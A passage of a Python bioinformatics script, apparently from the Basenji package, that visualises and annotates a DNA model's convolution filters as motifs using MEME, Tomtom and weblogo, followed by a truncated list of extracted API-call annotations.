filter_size = filter_weights.shape[2]
#################################################################
# individual filter plots
#################################################################
# also save information contents
filters_ic = []
meme_out = meme_intro('%s/filters_meme.txt' % options.out_dir, test_seqs)
for f in range(num_filters):
print('Filter %d' % f)
# plot filter parameters as a heatmap
plot_filter_heat(filter_weights[f, :, :],
'%s/filter%d_heat.pdf' % (options.out_dir, f))
# write possum motif file
filter_possum(filter_weights[f, :, :], 'filter%d' % f,
'%s/filter%d_possum.txt' % (options.out_dir,
f), options.trim_filters)
# plot weblogo of high scoring outputs
plot_filter_logo(
filter_outs[:, :, f],
filter_size,
test_seqs,
'%s/filter%d_logo' % (options.out_dir, f),
maxpct_t=options.act_t)
# make a PWM for the filter
filter_pwm, nsites = make_filter_pwm('%s/filter%d_logo.fa' %
(options.out_dir, f))
if nsites < 10:
# no information
filters_ic.append(0)
else:
# compute and save information content
filters_ic.append(info_content(filter_pwm))
# add to the meme motif file
meme_add(meme_out, f, filter_pwm, nsites, options.trim_filters)
meme_out.close()
#################################################################
# annotate filters
#################################################################
# run tomtom
subprocess.call(
'tomtom -dist pearson -thresh 0.1 -oc %s/tomtom %s/filters_meme.txt %s' %
(options.out_dir, options.out_dir, options.meme_db),
shell=True)
# read in annotations
filter_names = name_filters(
num_filters, '%s/tomtom/tomtom.txt' % options.out_dir, options.meme_db)
#################################################################
# print a table of information
#################################################################
table_out = open('%s/table.txt' % options.out_dir, 'w')
  # print header for later pandas reading
header_cols = ('', 'consensus', 'annotation', 'ic', 'mean', 'std')
print('%3s %19s %10s %5s %6s %6s' % header_cols, file=table_out)
for f in range(num_filters):
# collapse to a consensus motif
consensus = filter_motif(filter_weights[f, :, :])
# grab annotation
annotation = '.'
name_pieces = filter_names[f].split('_')
if len(name_pieces) > 1:
annotation = name_pieces[1]
# plot density of filter output scores
fmean, fstd = plot_score_density(
np.ravel(filter_outs[:, :, f]),
'%s/filter%d_dens.pdf' % (options.out_dir, f))
row_cols = (f, consensus, annotation, filters_ic[f], fmean, fstd)
print('%-3d %19s %10s %5.2f %6.4f %6.4f' % row_cols, file=table_out)
table_out.close()
#################################################################
# global filter plots
#################################################################
if options.plot_heats:
# plot filter-sequence heatmap
plot_filter_seq_heat(filter_outs, '%s/filter_seqs.pdf' % options.out_dir)
# plot filter-segment heatmap
plot_filter_seg_heat(filter_outs, '%s/filter_segs.pdf' % options.out_dir)
plot_filter_seg_heat(
filter_outs, '%s/filter_segs_raw.pdf' % options.out_dir, whiten=False)
# plot filter-target correlation heatmap
plot_target_corr(filter_outs, seq_targets, filter_names, target_names,
'%s/filter_target_cors_mean.pdf' % options.out_dir, 'mean')
plot_target_corr(filter_outs, seq_targets, filter_names, target_names,
'%s/filter_target_cors_max.pdf' % options.out_dir, 'max')
def get_motif_proteins(meme_db_file):
""" Hash motif_id's to protein names using the MEME DB file """
motif_protein = {}
for line in open(meme_db_file):
a = line.split()
if len(a) > 0 and a[0] == 'MOTIF':
if a[2][0] == '(':
motif_protein[a[1]] = a[2][1:a[2].find(')')]
else:
motif_protein[a[1]] = a[2]
return motif_protein
def info_content(pwm, transpose=False, bg_gc=0.415):
""" Compute PWM information content.
In the original analysis, I used a bg_gc=0.5. For any
future analysis, I ought to switch to the true hg19
value of 0.415.
"""
pseudoc = 1e-9
if transpose:
pwm = np.transpose(pwm)
bg_pwm = [1 - bg_gc, bg_gc, bg_gc, 1 - bg_gc]
ic = 0
for i in range(pwm.shape[0]):
for j in range(4):
# ic += 0.5 + pwm[i][j]*np.log2(pseudoc+pwm[i][j])
ic += -bg_pwm[j] * np.log2(
bg_pwm[j]) + pwm[i][j] * np.log2(pseudoc + pwm[i][j])
return ic
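# Illustrative usage of info_content (a sketch, not part of the original
# script; toy_pwm is a made-up matrix): a strongly conserved position
# contributes close to the maximum information, while a uniform position
# contributes roughly zero.
#   toy_pwm = np.array([[0.97, 0.01, 0.01, 0.01],
#                       [0.25, 0.25, 0.25, 0.25]])
#   info_content(toy_pwm)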
def make_filter_pwm(filter_fasta):
""" Make a PWM for this filter from its top hits """
nts = {'A': 0, 'C': 1, 'G': 2, 'T': 3}
pwm_counts = []
nsites = 4 # pseudocounts
for line in open(filter_fasta):
if line[0] != '>':
seq = line.rstrip()
nsites += 1
if len(pwm_counts) == 0:
# initialize with the length
for i in range(len(seq)):
pwm_counts.append(np.array([1.0] * 4))
# count
for i in range(len(seq)):
try:
pwm_counts[i][nts[seq[i]]] += 1
except KeyError:
pwm_counts[i] += np.array([0.25] * 4)
# normalize
pwm_freqs = []
for i in range(len(pwm_counts)):
pwm_freqs.append([pwm_counts[i][j] / float(nsites) for j in range(4)])
return np.array(pwm_freqs), nsites - 4
def meme_add(meme_out, f, filter_pwm, nsites, trim_filters=False):
""" Print a filter to the growing MEME file
Attrs:
meme_out : open file
f (int) : filter index #
filter_pwm (array) : filter PWM array
nsites (int) : number of filter sites
"""
if not trim_filters:
ic_start = 0
ic_end = filter_pwm.shape[0] - 1
else:
ic_t = 0.2
# trim PWM of uninformative prefix
ic_start = 0
while ic_start < filter_pwm.shape[0] and info_content(
filter_pwm[ic_start:ic_start + 1]) < ic_t:
ic_start += 1
# trim PWM of uninformative suffix
ic_end = filter_pwm.shape[0] - 1
while ic_end >= 0 and info_content(filter_pwm[ic_end:ic_end + 1]) < ic_t:
ic_end -= 1
if ic_start < ic_end:
print('MOTIF filter%d' % f, file=meme_out)
print(
'letter-probability matrix: alength= 4 w= %d nsites= %d' %
(ic_end - ic_start + 1, nsites),
file=meme_out)
for i in range(ic_start, ic_end + 1):
print('%.4f %.4f %.4f %.4f' % tuple(filter_pwm[i]), file=meme_out)
print('', file=meme_out)
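# For reference, each motif block written by meme_add above follows the
# minimal MEME motif format; the numbers below are illustrative only:
#   MOTIF filter0
#   letter-probability matrix: alength= 4 w= 12 nsites= 87
#   0.2500 0.2500 0.2500 0.2500
#   ...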
def meme_intro(meme_file, seqs):
""" Open MEME motif format file and print intro
Attrs:
meme_file (str) : filename
seqs [str] : list of strings for obtaining background freqs
Returns:
mem_out : open MEME file
"""
nts = {'A': 0, 'C': 1, 'G': 2, 'T': 3}
# count
nt_counts = [1] * 4
for i in range(len(seqs)):
for nt in seqs[i]:
try:
nt_counts[nts[nt]] += 1
except KeyError:
pass
# normalize
nt_sum = float(sum(nt_counts))
nt_freqs = [nt_counts[i] / nt_sum for i in range(4)]
# open file for writing
meme_out = open(meme_file, 'w')
# print intro material
print('MEME version 4', file=meme_out)
print('', file=meme_out)
print('ALPHABET= ACGT', file=meme_out)
print('', file=meme_out)
print('Background letter frequencies:', file=meme_out)
print('A %.4f C %.4f G %.4f T %.4f' % tuple(nt_freqs), file=meme_out)
print('', file=meme_out)
return meme_out
def name_filters(num_filters, tomtom_file, meme_db_file):
""" Name the filters using Tomtom matches.
Attrs:
num_filters (int) : total number of filters
tomtom_file (str) : filename of Tomtom output table.
meme_db_file (str) : filename of MEME db
Returns:
    filter_names [str] : filter names, annotated with the best-matching protein when a Tomtom match exists
"""
# name by number
filter_names = ['f%d' % fi for fi in range(num_filters)]
# name by protein
if tomtom_file is not None and meme_db_file is not None:
motif_protein = get_motif_proteins(meme_db_file)
# hash motifs and q-value's by filter
filter_motifs = {}
tt_in = open(tomtom_file)
tt_in.readline()
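    # The Tomtom table is assumed to be whitespace-separated with the query
    # name ('filter<N>') in column 1, the matched motif ID in column 2 and the
    # match q-value in column 6, as parsed below.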
for line in tt_in:
a = line.split()
fi = int(a[0][6:])
motif_id = a[1]
qval = float(a[5])
filter_motifs.setdefault(fi, []).append((qval, motif_id))
tt_in.close()
# assign filter's best match
for fi in filter_motifs:
top_motif = sorted(filter_motifs[fi])[0][1]
filter_names[fi] += '_%s' % motif_protein[top_motif]
return np.array(filter_names)
################################################################################
# plot_target_corr
#
# Plot a clustered heatmap of correlations between filter activations and
# targets.
#
# Input
# filter_outs:
# filter_names:
# target_names:
# out_pdf:
################################################################################
def plot_target_corr(filter_outs, seq_targets, filter_names, target_names, out_pdf, seq_op='mean'):
num_seqs = filter_outs.shape[0]
num_targets = len(target_names)
if seq_op == 'mean':
filter_outs_seq = filter_outs.mean(axis=2)
else:
filter_outs_seq = filter_outs.max(axis=2)
# std is sequence by filter.
filter_seqs_std = filter_outs_seq.std(axis=0)
filter_outs_seq = filter_outs_seq[:, filter_seqs_std > 0]
filter_names_live = filter_names[filter_seqs_std > 0]
filter_target_cors = np.zeros((len(filter_names_live), num_targets))
for fi in range(len(filter_names_live)):
for ti in range(num_targets):
cor, p = spearmanr(filter_outs_seq[:, fi], seq_targets[:num_seqs, ti])
filter_target_cors[fi, ti] = cor
cor_df = pd.DataFrame(
filter_target_cors, index=filter_names_live, columns=target_names)
sns.set(font_scale=0.3)
plt.figure()
sns.clustermap(cor_df, cmap='BrBG', center=0, figsize=(8, 10))
plt.savefig(out_pdf)
plt.close()
################################################################################
# plot_filter_seq_heat
#
#  Plot a clustered heatmap of filter activations in the test sequences.
#
# Input
# param_matrix: np.array of the filter's parameter matrix
# out_pdf:
################################################################################
def plot_filter_seq_heat(filter_outs, out_pdf, whiten=True, drop_dead=True):
# compute filter output means per sequence
filter_seqs = filter_outs.mean(axis=2)
# whiten
if whiten:
filter_seqs = preprocessing.scale(filter_seqs)
# transpose
filter_seqs = np.transpose(filter_seqs)
if drop_dead:
filter_stds = filter_seqs.std(axis=1)
filter_seqs = filter_seqs[filter_stds > 0]
# downsample sequences
seqs_i = np.random.randint(0, filter_seqs.shape[1], 500)
hmin = np.percentile(filter_seqs[:, seqs_i], 0.1)
hmax = np.percentile(filter_seqs[:, seqs_i], 99.9)
sns.set(font_scale=0.3)
plt.figure()
sns.clustermap(
filter_seqs[:, seqs_i],
row_cluster=True,
col_cluster=True,
linewidths=0,
xticklabels=False,
vmin=hmin,
vmax=hmax)
plt.savefig(out_pdf)
#out_png = out_pdf[:-2] + 'ng'
#plt.savefig(out_png, dpi=300)
plt.close()
################################################################################
# plot_filter_seg_heat
#
# Plot a clustered heatmap of filter activations in sequence segments.
#
# Mean doesn't work well for the smaller segments for some reason, but taking
# the max looks OK. Still, similar motifs don't cluster quite as well as you
# might expect.
#
# Input
# filter_outs
################################################################################
def plot_filter_seg_heat(filter_outs, out_pdf, whiten=True, drop_dead=True):
b = filter_outs.shape[0]
f = filter_outs.shape[1]
l = filter_outs.shape[2]
s = 5
  while l % s != 0:
    s += 1
  print('%d segments of length %d' % (s, l // s))
  # split into multiple segments
  filter_outs_seg = np.reshape(filter_outs, (b, f, s, l // s))
# mean across the segments
filter_outs_mean = filter_outs_seg.max(axis=3)
# break each segment into a new instance
filter_seqs = np.reshape(np.swapaxes(filter_outs_mean, 2, 1), (s * b, f))
# whiten
if whiten:
filter_seqs = preprocessing.scale(filter_seqs)
# transpose
filter_seqs = np.transpose(filter_seqs)
if drop_dead:
filter_stds = filter_seqs.std(axis=1)
filter_seqs = filter_seqs[filter_stds > 0]
# downsample sequences
seqs_i = np.random.randint(0, filter_seqs.shape[1], 500)
hmin = np.percentile(filter_seqs[:, seqs_i], 0.1)
hmax = np.percentile(filter_seqs[:, seqs_i], 99.9)
sns.set(font_scale=0.3)
if whiten:
dist = 'euclidean'
else:
dist = 'cosine'
plt.figure()
sns.clustermap(
filter_seqs[:, seqs_i],
metric=dist,
row_cluster=True,
col_cluster=True,
linewidths=0,
xticklabels=False,
vmin=hmin,
vmax=hmax)
plt.savefig(out_pdf)
#out_png = out_pdf[:-2] + 'ng'
#plt.savefig(out_png, dpi=300)
plt.close()
################################################################################
# filter_motif
#
# Collapse the filter parameter matrix to a single DNA motif.
#
# Input
#  param_matrix: np.array of the filter's parameter matrix
################################################################################
def filter_motif(param_matrix):
nts = 'ACGT'
motif_list = []
for v in range(param_matrix.shape[1]):
max_n = 0
for n in range(1, 4):
if param_matrix[n, v] > param_matrix[max_n, v]:
max_n = n
if param_matrix[max_n, v] > 0:
motif_list.append(nts[max_n])
else:
motif_list.append('N')
return ''.join(motif_list)
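# Example (illustrative): if a filter's largest per-position weights pick out
# A, C and G and are positive, and no weight is positive at the final
# position, the filter collapses to the consensus string 'ACGN'.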
################################################################################
# filter_possum
#
# Write a Possum-style motif
#
# Input
#  param_matrix: np.array of the filter's parameter matrix
#  motif_id: name written into the Possum motif block
#  possum_file: output filename
################################################################################
def filter_possum(param_matrix, motif_id, possum_file, trim_filters=False, mult=200):
# possible trim
trim_start = 0
trim_end = param_matrix.shape[1] - 1
trim_t = 0.3
if trim_filters:
# trim PWM of uninformative prefix
while trim_start < param_matrix.shape[1] and np.max(
param_matrix[:, trim_start]) - np.min(
param_matrix[:, trim_start]) < trim_t:
trim_start += 1
# trim PWM of uninformative suffix
while trim_end >= 0 and np.max(param_matrix[:, trim_end]) - np.min(
param_matrix[:, trim_end]) < trim_t:
trim_end -= 1
if trim_start < trim_end:
possum_out = open(possum_file, 'w')
print('BEGIN GROUP', file=possum_out)
print('BEGIN FLOAT', file=possum_out)
print('ID %s' % motif_id, file=possum_out)
print('AP DNA', file=possum_out)
print('LE %d' % (trim_end + 1 - trim_start), file=possum_out)
for ci in range(trim_start, trim_end + 1):
print(
'MA %s' % ' '.join(['%.2f' % (mult * n)
for n in param_matrix[:, ci]]),
file=possum_out)
print('END', file=possum_out)
print('END', file=possum_out)
possum_out.close()
################################################################################
# plot_filter_heat
#
# Plot a heatmap of the filter's parameters.
#
# Input
# param_matrix: np.array of the filter's parameter matrix
# out_pdf:
################################################################################
def plot_filter_heat(param_matrix, out_pdf):
param_range = abs(param_matrix).max()
sns.set(font_scale=2)
plt.figure(figsize=(param_matrix.shape[1], 4))
sns.heatmap(
param_matrix,
cmap='PRGn',
linewidths=0.2,
vmin=-param_range,
vmax=param_range)
ax = plt.gca()
ax.set_xticklabels(range(1, param_matrix.shape[1] + 1))
ax.set_yticklabels('TGCA', rotation='horizontal') # , size=10)
plt.savefig(out_pdf)
plt.close()
################################################################################
# plot_filter_logo
#
# Plot a weblogo of the filter's occurrences
#
# Input
#  filter_outs: np.array of this filter's activations across the test sequences
#  filter_size: width of the convolution filter
#  seqs: test sequences as letter strings
#  out_prefix: prefix for the output fasta/logo files
################################################################################
def plot_filter_logo(filter_outs, filter_size, seqs, out_prefix, raw_t=0, maxpct_t=None):
if maxpct_t:
all_outs = np.ravel(filter_outs)
all_outs_mean = all_outs.mean()
all_outs_norm = all_outs - all_outs_mean
raw_t = maxpct_t * all_outs_norm.max() + all_outs_mean
left_pad = (filter_size - 1) // 2
right_pad = filter_size - left_pad
# print fasta file of positive outputs
filter_fasta_out = open('%s.fa' % out_prefix, 'w')
filter_count = 0
for i in range(filter_outs.shape[0]):
for j in range(filter_outs.shape[1]):
if filter_outs[i, j] > raw_t:
# construct kmer
kmer = ''
# determine boundaries, considering padding
fstart = j - left_pad
fend = fstart + filter_size
# if it starts in left_pad
if fstart < 0:
kmer += 'N' * (-fstart)
fstart = 0
# add primary sequence
kmer += seqs[i][fstart:fend]
# if it ends in right_pad
if fend > len(seqs[i]):
kmer += 'N' * (fend - len(seqs[i]))
# output
print('>%d_%d' % (i, j), file=filter_fasta_out)
print(kmer, file=filter_fasta_out)
filter_count += 1
filter_fasta_out.close()
# make weblogo
if filter_count > 0:
weblogo_cmd = 'weblogo %s < %s.fa > %s.eps' % (weblogo_opts, out_prefix,
out_prefix)
subprocess.call(weblogo_cmd, shell=True)
################################################################################
# plot_score_density
#
# Plot the score density and print to the stats table.
#
# Input
#  f_scores: np.array of the filter's output scores
# out_pdf:
################################################################################
def plot_score_density(f_scores, out_pdf):
sns.set(font_scale=1.3)
plt.figure()
sns.distplot(f_scores, kde=False)
plt.xlabel('ReLU output')
plt.savefig(out_pdf)
plt.close()
return f_scores.mean(), f_scores.std()
################################################################################
# __main__
################################################################################
if __name__ == '__main__':
main()
# pdb.runcall(main)
| [
"basenji.seqnn.SeqNN",
"numpy.array",
"basenji.dna_io.read_job_params",
"basenji.batcher.BatcherF",
"seaborn.set",
"numpy.reshape",
"seaborn.distplot",
"matplotlib.pyplot.xlabel",
"basenji.batcher.Batcher",
"tensorflow.Session",
"numpy.max",
"matplotlib.pyplot.close",
"os.path.isdir",
"basenji.dna_io.hot1_dna",
"subprocess.call",
"os.mkdir",
"numpy.min",
"pandas.DataFrame",
"scipy.stats.spearmanr",
"matplotlib.pyplot.savefig",
"matplotlib.use",
"seaborn.clustermap",
"matplotlib.pyplot.gca",
"seaborn.heatmap",
"h5py.File",
"numpy.squeeze",
"numpy.log2",
"numpy.transpose",
"time.time",
"sklearn.preprocessing.scale",
"tensorflow.train.Saver",
"optparse.OptionParser",
"numpy.swapaxes",
"matplotlib.pyplot.figure",
"numpy.random.randint",
"numpy.ravel",
"numpy.percentile"
] | [((829, 850), 'matplotlib.use', 'matplotlib.use', (['"""PDF"""'], {}), "('PDF')\n", (843, 850), False, 'import matplotlib\n'), ((1670, 1689), 'optparse.OptionParser', 'OptionParser', (['usage'], {}), '(usage)\n', (1682, 1689), False, 'from optparse import OptionParser\n'), ((3270, 3290), 'h5py.File', 'h5py.File', (['data_file'], {}), '(data_file)\n', (3279, 3290), False, 'import h5py\n'), ((3793, 3828), 'basenji.dna_io.hot1_dna', 'basenji.dna_io.hot1_dna', (['test_seqs1'], {}), '(test_seqs1)\n', (3816, 3828), False, 'import basenji\n'), ((3945, 3988), 'basenji.dna_io.read_job_params', 'basenji.dna_io.read_job_params', (['params_file'], {}), '(params_file)\n', (3975, 3988), False, 'import basenji\n'), ((4195, 4206), 'time.time', 'time.time', ([], {}), '()\n', (4204, 4206), False, 'import copy, os, pdb, random, shutil, subprocess, time\n'), ((4214, 4235), 'basenji.seqnn.SeqNN', 'basenji.seqnn.SeqNN', ([], {}), '()\n', (4233, 4235), False, 'import basenji\n'), ((5041, 5057), 'tensorflow.train.Saver', 'tf.train.Saver', ([], {}), '()\n', (5055, 5057), True, 'import tensorflow as tf\n'), ((7204, 7367), 'subprocess.call', 'subprocess.call', (["('tomtom -dist pearson -thresh 0.1 -oc %s/tomtom %s/filters_meme.txt %s' %\n (options.out_dir, options.out_dir, options.meme_db))"], {'shell': '(True)'}), "(\n 'tomtom -dist pearson -thresh 0.1 -oc %s/tomtom %s/filters_meme.txt %s' %\n (options.out_dir, options.out_dir, options.meme_db), shell=True)\n", (7219, 7367), False, 'import copy, os, pdb, random, shutil, subprocess, time\n'), ((14271, 14293), 'numpy.array', 'np.array', (['filter_names'], {}), '(filter_names)\n', (14279, 14293), True, 'import numpy as np\n'), ((15402, 15481), 'pandas.DataFrame', 'pd.DataFrame', (['filter_target_cors'], {'index': 'filter_names_live', 'columns': 'target_names'}), '(filter_target_cors, index=filter_names_live, columns=target_names)\n', (15414, 15481), True, 'import pandas as pd\n'), ((15492, 15515), 'seaborn.set', 'sns.set', ([], {'font_scale': '(0.3)'}), '(font_scale=0.3)\n', (15499, 15515), True, 'import seaborn as sns\n'), ((15518, 15530), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (15528, 15530), True, 'import matplotlib.pyplot as plt\n'), ((15533, 15595), 'seaborn.clustermap', 'sns.clustermap', (['cor_df'], {'cmap': '"""BrBG"""', 'center': '(0)', 'figsize': '(8, 10)'}), "(cor_df, cmap='BrBG', center=0, figsize=(8, 10))\n", (15547, 15595), True, 'import seaborn as sns\n'), ((15598, 15618), 'matplotlib.pyplot.savefig', 'plt.savefig', (['out_pdf'], {}), '(out_pdf)\n', (15609, 15618), True, 'import matplotlib.pyplot as plt\n'), ((15621, 15632), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (15630, 15632), True, 'import matplotlib.pyplot as plt\n'), ((16225, 16250), 'numpy.transpose', 'np.transpose', (['filter_seqs'], {}), '(filter_seqs)\n', (16237, 16250), True, 'import numpy as np\n'), ((16394, 16441), 'numpy.random.randint', 'np.random.randint', (['(0)', 'filter_seqs.shape[1]', '(500)'], {}), '(0, filter_seqs.shape[1], 500)\n', (16411, 16441), True, 'import numpy as np\n'), ((16452, 16494), 'numpy.percentile', 'np.percentile', (['filter_seqs[:, seqs_i]', '(0.1)'], {}), '(filter_seqs[:, seqs_i], 0.1)\n', (16465, 16494), True, 'import numpy as np\n'), ((16504, 16547), 'numpy.percentile', 'np.percentile', (['filter_seqs[:, seqs_i]', '(99.9)'], {}), '(filter_seqs[:, seqs_i], 99.9)\n', (16517, 16547), True, 'import numpy as np\n'), ((16551, 16574), 'seaborn.set', 'sns.set', ([], {'font_scale': '(0.3)'}), '(font_scale=0.3)\n', (16558, 
16574), True, 'import seaborn as sns\n'), ((16578, 16590), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (16588, 16590), True, 'import matplotlib.pyplot as plt\n'), ((16593, 16726), 'seaborn.clustermap', 'sns.clustermap', (['filter_seqs[:, seqs_i]'], {'row_cluster': '(True)', 'col_cluster': '(True)', 'linewidths': '(0)', 'xticklabels': '(False)', 'vmin': 'hmin', 'vmax': 'hmax'}), '(filter_seqs[:, seqs_i], row_cluster=True, col_cluster=True,\n linewidths=0, xticklabels=False, vmin=hmin, vmax=hmax)\n', (16607, 16726), True, 'import seaborn as sns\n'), ((16768, 16788), 'matplotlib.pyplot.savefig', 'plt.savefig', (['out_pdf'], {}), '(out_pdf)\n', (16779, 16788), True, 'import matplotlib.pyplot as plt\n'), ((16857, 16868), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (16866, 16868), True, 'import matplotlib.pyplot as plt\n'), ((17644, 17685), 'numpy.reshape', 'np.reshape', (['filter_outs', '(b, f, s, l / s)'], {}), '(filter_outs, (b, f, s, l / s))\n', (17654, 17685), True, 'import numpy as np\n'), ((17992, 18017), 'numpy.transpose', 'np.transpose', (['filter_seqs'], {}), '(filter_seqs)\n', (18004, 18017), True, 'import numpy as np\n'), ((18161, 18208), 'numpy.random.randint', 'np.random.randint', (['(0)', 'filter_seqs.shape[1]', '(500)'], {}), '(0, filter_seqs.shape[1], 500)\n', (18178, 18208), True, 'import numpy as np\n'), ((18219, 18261), 'numpy.percentile', 'np.percentile', (['filter_seqs[:, seqs_i]', '(0.1)'], {}), '(filter_seqs[:, seqs_i], 0.1)\n', (18232, 18261), True, 'import numpy as np\n'), ((18271, 18314), 'numpy.percentile', 'np.percentile', (['filter_seqs[:, seqs_i]', '(99.9)'], {}), '(filter_seqs[:, seqs_i], 99.9)\n', (18284, 18314), True, 'import numpy as np\n'), ((18318, 18341), 'seaborn.set', 'sns.set', ([], {'font_scale': '(0.3)'}), '(font_scale=0.3)\n', (18325, 18341), True, 'import seaborn as sns\n'), ((18409, 18421), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (18419, 18421), True, 'import matplotlib.pyplot as plt\n'), ((18424, 18570), 'seaborn.clustermap', 'sns.clustermap', (['filter_seqs[:, seqs_i]'], {'metric': 'dist', 'row_cluster': '(True)', 'col_cluster': '(True)', 'linewidths': '(0)', 'xticklabels': '(False)', 'vmin': 'hmin', 'vmax': 'hmax'}), '(filter_seqs[:, seqs_i], metric=dist, row_cluster=True,\n col_cluster=True, linewidths=0, xticklabels=False, vmin=hmin, vmax=hmax)\n', (18438, 18570), True, 'import seaborn as sns\n'), ((18618, 18638), 'matplotlib.pyplot.savefig', 'plt.savefig', (['out_pdf'], {}), '(out_pdf)\n', (18629, 18638), True, 'import matplotlib.pyplot as plt\n'), ((18707, 18718), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (18716, 18718), True, 'import matplotlib.pyplot as plt\n'), ((21275, 21296), 'seaborn.set', 'sns.set', ([], {'font_scale': '(2)'}), '(font_scale=2)\n', (21282, 21296), True, 'import seaborn as sns\n'), ((21299, 21345), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(param_matrix.shape[1], 4)'}), '(figsize=(param_matrix.shape[1], 4))\n', (21309, 21345), True, 'import matplotlib.pyplot as plt\n'), ((21348, 21443), 'seaborn.heatmap', 'sns.heatmap', (['param_matrix'], {'cmap': '"""PRGn"""', 'linewidths': '(0.2)', 'vmin': '(-param_range)', 'vmax': 'param_range'}), "(param_matrix, cmap='PRGn', linewidths=0.2, vmin=-param_range,\n vmax=param_range)\n", (21359, 21443), True, 'import seaborn as sns\n'), ((21478, 21487), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (21485, 21487), True, 'import matplotlib.pyplot as plt\n'), ((21614, 21634), 
'matplotlib.pyplot.savefig', 'plt.savefig', (['out_pdf'], {}), '(out_pdf)\n', (21625, 21634), True, 'import matplotlib.pyplot as plt\n'), ((21637, 21648), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (21646, 21648), True, 'import matplotlib.pyplot as plt\n'), ((23772, 23795), 'seaborn.set', 'sns.set', ([], {'font_scale': '(1.3)'}), '(font_scale=1.3)\n', (23779, 23795), True, 'import seaborn as sns\n'), ((23798, 23810), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (23808, 23810), True, 'import matplotlib.pyplot as plt\n'), ((23813, 23846), 'seaborn.distplot', 'sns.distplot', (['f_scores'], {'kde': '(False)'}), '(f_scores, kde=False)\n', (23825, 23846), True, 'import seaborn as sns\n'), ((23849, 23874), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""ReLU output"""'], {}), "('ReLU output')\n", (23859, 23874), True, 'import matplotlib.pyplot as plt\n'), ((23877, 23897), 'matplotlib.pyplot.savefig', 'plt.savefig', (['out_pdf'], {}), '(out_pdf)\n', (23888, 23897), True, 'import matplotlib.pyplot as plt\n'), ((23900, 23911), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (23909, 23911), True, 'import matplotlib.pyplot as plt\n'), ((3110, 3140), 'os.path.isdir', 'os.path.isdir', (['options.out_dir'], {}), '(options.out_dir)\n', (3123, 3140), False, 'import copy, os, pdb, random, shutil, subprocess, time\n'), ((3146, 3171), 'os.mkdir', 'os.mkdir', (['options.out_dir'], {}), '(options.out_dir)\n', (3154, 3171), False, 'import copy, os, pdb, random, shutil, subprocess, time\n'), ((4674, 4804), 'basenji.batcher.BatcherF', 'basenji.batcher.BatcherF', (['test_seqs1', 'test_targets', 'test_targets_imag'], {'batch_size': 'dr.batch_size', 'pool_width': "job['target_pool']"}), "(test_seqs1, test_targets, test_targets_imag,\n batch_size=dr.batch_size, pool_width=job['target_pool'])\n", (4698, 4804), False, 'import basenji\n'), ((4869, 4979), 'basenji.batcher.Batcher', 'basenji.batcher.Batcher', (['test_seqs1', 'test_targets'], {'batch_size': 'dr.batch_size', 'pool_width': "job['target_pool']"}), "(test_seqs1, test_targets, batch_size=dr.batch_size,\n pool_width=job['target_pool'])\n", (4892, 4979), False, 'import basenji\n'), ((5066, 5078), 'tensorflow.Session', 'tf.Session', ([], {}), '()\n', (5076, 5078), True, 'import tensorflow as tf\n'), ((5355, 5366), 'time.time', 'time.time', ([], {}), '()\n', (5364, 5366), False, 'import copy, os, pdb, random, shutil, subprocess, time\n'), ((10067, 10084), 'numpy.transpose', 'np.transpose', (['pwm'], {}), '(pwm)\n', (10079, 10084), True, 'import numpy as np\n'), ((11127, 11146), 'numpy.array', 'np.array', (['pwm_freqs'], {}), '(pwm_freqs)\n', (11135, 11146), True, 'import numpy as np\n'), ((16161, 16193), 'sklearn.preprocessing.scale', 'preprocessing.scale', (['filter_seqs'], {}), '(filter_seqs)\n', (16180, 16193), False, 'from sklearn import preprocessing\n'), ((17836, 17871), 'numpy.swapaxes', 'np.swapaxes', (['filter_outs_mean', '(2)', '(1)'], {}), '(filter_outs_mean, 2, 1)\n', (17847, 17871), True, 'import numpy as np\n'), ((17928, 17960), 'sklearn.preprocessing.scale', 'preprocessing.scale', (['filter_seqs'], {}), '(filter_seqs)\n', (17947, 17960), False, 'from sklearn import preprocessing\n'), ((22080, 22101), 'numpy.ravel', 'np.ravel', (['filter_outs'], {}), '(filter_outs)\n', (22088, 22101), True, 'import numpy as np\n'), ((23363, 23403), 'subprocess.call', 'subprocess.call', (['weblogo_cmd'], {'shell': '(True)'}), '(weblogo_cmd, shell=True)\n', (23378, 23403), False, 'import copy, os, pdb, random, shutil, subprocess, 
time\n'), ((5263, 5289), 'numpy.squeeze', 'np.squeeze', (['filter_weights'], {}), '(filter_weights)\n', (5273, 5289), True, 'import numpy as np\n'), ((8287, 8317), 'numpy.ravel', 'np.ravel', (['filter_outs[:, :, f]'], {}), '(filter_outs[:, :, f])\n', (8295, 8317), True, 'import numpy as np\n'), ((15289, 15350), 'scipy.stats.spearmanr', 'spearmanr', (['filter_outs_seq[:, fi]', 'seq_targets[:num_seqs, ti]'], {}), '(filter_outs_seq[:, fi], seq_targets[:num_seqs, ti])\n', (15298, 15350), False, 'from scipy.stats import spearmanr\n'), ((4289, 4300), 'time.time', 'time.time', ([], {}), '()\n', (4298, 4300), False, 'import copy, os, pdb, random, shutil, subprocess, time\n'), ((10281, 10299), 'numpy.log2', 'np.log2', (['bg_pwm[j]'], {}), '(bg_pwm[j])\n', (10288, 10299), True, 'import numpy as np\n'), ((10325, 10353), 'numpy.log2', 'np.log2', (['(pseudoc + pwm[i][j])'], {}), '(pseudoc + pwm[i][j])\n', (10332, 10353), True, 'import numpy as np\n'), ((19977, 20012), 'numpy.max', 'np.max', (['param_matrix[:, trim_start]'], {}), '(param_matrix[:, trim_start])\n', (19983, 20012), True, 'import numpy as np\n'), ((20024, 20059), 'numpy.min', 'np.min', (['param_matrix[:, trim_start]'], {}), '(param_matrix[:, trim_start])\n', (20030, 20059), True, 'import numpy as np\n'), ((20173, 20206), 'numpy.max', 'np.max', (['param_matrix[:, trim_end]'], {}), '(param_matrix[:, trim_end])\n', (20179, 20206), True, 'import numpy as np\n'), ((20209, 20242), 'numpy.min', 'np.min', (['param_matrix[:, trim_end]'], {}), '(param_matrix[:, 